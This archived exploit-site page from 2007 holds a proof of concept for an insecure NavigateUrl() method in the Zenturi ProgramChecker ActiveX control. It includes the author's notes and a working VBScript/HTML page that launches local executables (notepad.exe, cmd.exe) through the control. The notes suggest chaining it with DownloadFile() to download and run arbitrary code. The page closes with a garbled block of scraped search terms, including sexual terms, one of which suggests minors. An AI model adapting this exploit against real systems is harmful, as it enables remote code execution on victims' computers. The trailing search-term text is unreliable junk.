about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit




2007-06-09 Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit
Rated as : High Risk

<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol">-----------------------------------------------------------------------------
 <b>Zenturi ProgramChecker ActiveX Control "NavigateUrl()"
Insecure Method</b>
 
 url: http://www.programchecker.com/activeintro.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer
7

 I can't believe my eyes when I see what you can do with this ActiveX
 (and I can't believe that this product is considered as antispyware).
 You can use the "NavigateUrl()" to arbitrary launch local file
from a pc.
 Try, for example, to launch "c:somefile.exe" and see what
happen.
 Imagine to use this method with the "DownloadFile()" one, you
can download
 something on the pc and run it without problems.
 For the "DownloadFile()" vulnerability see:
 <a
href="http://securitydot.net/xpl/exploits/vulnerabilities/articles/1831/exploit.html">Zenturi
ProgramChecker ActiveX Multiple Insecure Methods Exploit</a>
-----------------------------------------------------------------------------

<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test'
></object>

<input language=VBScript onclick=tryMe() type=button value="Click
here to start the test">

<script language='vbscript'>
Sub tryMe()
 
 test.NavigateUrl "notepad.exe" ,"shinnai"
,"_SELF"
 test.NavigateUrl "cmd.exe" ,"shinnai"
,"_SELF"

End Sub
</script>
</span></span>
</code></pre>
securitydot.net - 2007-06-09

Advertising

Copyright 2007, SecurityDot
Sat, 04 Jul 2009 22:52:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
fotos jues poll games Vido movie fotos jues poikpt vulnerabil rajini pic juliaperes joomla! is Www.Asean www.echang Acter_kare Www.cina b /search/ex Firstnight www simbu Www 17+abg WWW.WORLD t848t famme arab ip board 2 Www.playbo components boxellywoo WWW.anal.c yourfileho Indonesa v Animalsexm sleazydrea Nakad girl www.cnker. naked pepe vivi ferna Indiamovis www.tamil just dance Strawberry hauru.php Amateurtee www.mctsex just dance hauru.php ...y),655 WWW XXL ne sex18 ans wwwsex..co narutochao celebirty Dragonball winklin